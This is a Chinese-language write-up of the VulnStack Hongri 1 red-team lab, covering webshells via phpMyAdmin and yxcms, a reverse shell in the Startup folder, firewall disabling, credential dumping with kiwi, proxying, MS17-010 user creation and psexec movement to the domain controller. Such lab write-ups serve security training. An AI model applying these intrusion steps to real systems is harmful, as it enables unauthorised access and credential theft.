VulnStack-红日1
写在前面: 本题使用了Cobalt Strike和fscan,并不是kali带有的工具,请自行下载
vulnstack红队1
拍快照,拍快照,拍快照!不然你做不出来想要remake都做不到
新增两个虚拟网络: 192.168.52.0/24 内网环境(Vmnet1) 192.168.72.0/24 外网环境(Vmnet2)
靶机初始密码均为
hongrisec@2019
当win7可以ping通所有ip地址, 环境就配置完成了
-
kali
192.168.72.128
-
Windows7 x64 密码更换为
hongrisec@2024
, 记得开启php 192.168.72.129 192.168.52.143 -
Windows Server 2008 R2 x64 密码更换为
hongrisec@2024
192.168.52.138 -
Win2K3 Metasploitable 配置如下图 192.168.52.130
虽然因为配置是可以直接攻击域控的,但是题目本来是不行的,所以还是根据给的图来进行攻击
可惜最后还是直接上域控了
¶外网渗透
¶主机发现
进行nmap扫描后可以得到自己的主机和在外网的主机192.168.72.129
同时可以得到目标开放了80和3306端口, 先访问看看吧
nmap 192.168.72.0/24 |
¶信息收集
用浏览器访问目标网页,发现是一个phpStudy探针, 里面有大量敏感信息
绝对路径 C:/phpStudy/WWW |
¶目录扫描
利用dirsearch
进行扫描, 可以得到phpMyadmin
的目录信息
尝试登录, 发现是弱密码, 账号密码都为root
更换字典可以扫描到备份文件 (此处shell是因为已通过phpMyadmin进行getshell)
¶漏洞利用
- phpMyadmin
查询secure_file_priv
属性, 发现为NULL, 采用日志写马
show variables like '%general%'; // 查询日志状态 |
然后用蚁剑连接就行,路径在网站根目录
- yxcms
通过查看下载下来的备份文件可以知道这似乎是yxcms网站
可以访问192.168.72.129/yxcms/
来查看首页,右侧公告信息给出了敏感信息
后台地址: /index.php?r=admin
用户名: admin
密码: 123456
登录后发现可以更改模板php文件,写马即可
修改index_index.php
,直接在最上方加上一句话木马即可,随后蚁剑连接
不管什么方法,getshell后利用msf进行下一步: 上传反弹shell (随意放,放启动项是习惯)
C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/ |
然后用msf进行监听, 蚁剑运行上传的反弹木马
// 生成 |
连接后进入shell
进行内网信息收集
¶内网信息收集
- 域信息收集
乱码使用chcp 65001
解决
whoami // 当前权限 god\administrator |
可以看到我们处于GOD
域内
查看arp缓存, 可以看到可能存活的主机
通过ping域DNS名称来查找域控主机,得到域控192.168.52.138
关闭win7防火墙
netsh advfirewall set allprofiles state off |
- 密码抓取
接下来提权到system权限,利用getsystem
即可, 可以得到Administrator的密码
load kiwi |
¶内网渗透
¶搭建路由和代理
先添加通向192.168.52.0
内网的路由
route add 192.168.52.0 255.255.255.0 1 // 数字是会话序号 |
利用msf搭建socks代理
socks代理仅仅是为了代理工具,如果仅用msf进行操作,不需要搭建
use auxiliary/server/socks_proxy |
¶横向移动
利用fscan
进行扫描或者用proxychains
代理扫描工具
fscan64.exe -h 192.168.52.130 |
终究还是败给了cs的好用
首先上传cs木马, 监听和连接,这里不在赘述,记得会话设置sleep为1,否则等半天
- 搭建SMB Beacon
SMB Beacon使用windows管道进行通信,可以把以此为枢纽,进行内外网的流量转发
新建监听器, 选择payload为Beacon SMB
,随便取名,我的取名为smb
然后在要建立SMB Beacon
的beacon对话框中输入spawn [name]
如下图,我在红色箭头的会话中输入了spawn smb
,它的右侧就会多出来一个
我发现这里连不上另一个域成员却可以直接用psexec登录域控,这下坏了
算了,就在这里结束吧,毕竟可以直接利用抓到的令牌进行psexec横向移动,给出步骤:
切换视图然后右键,选择psexec
然后选择令牌,令牌看上去似乎很少或者没有就去抓取明文密码和抓取hash
监听器就选创建的smb和新出现的会话, 注意这个OWA才是域控,看ip分辨
运行即可,一般出现established link to child beacon: ip
就算成功,ip是谁创建的会话就是谁,不放心可以用shell ipconfig
验证
如下,原来的图新增一个会话,然后ip也正确,我们已经拿下域控了
下面都是乱走的路,在此处没用
假如你想看全程用msf利用psexec登录域控的,去看
vulnstack红队5
,但是msf不是很稳定
利用telnet攻击:
开放了445端口,扫出了MS17-010漏洞,尝试利用(换了好几个payload,这个行,可能是才疏学浅)
use auxiliary/admin/smb/ms17_010_command |
可以执行命令就可以转变为建立一个用户然后用telnet连接或者利用3389远程连接
虽然telnet只能上传文件不能执行,但是可以通过msf执行然后反弹shell
再或者利用msf的模块直接建立会话
set command net user test hack@2024 /add // 新建用户,密码不能太简单,不能包含用户名 |
尝试msf的telnet模块连接
use auxiliary/scanner/telnet/telnet_login |
连接后这个session似乎不能执行命令,我猜测是因为这个模块是针对linux的,因为在尝试利用python,python3,script,socat等等进行会话建立
手动进行telnet连接
proxychains telnet 192.168.52.130 |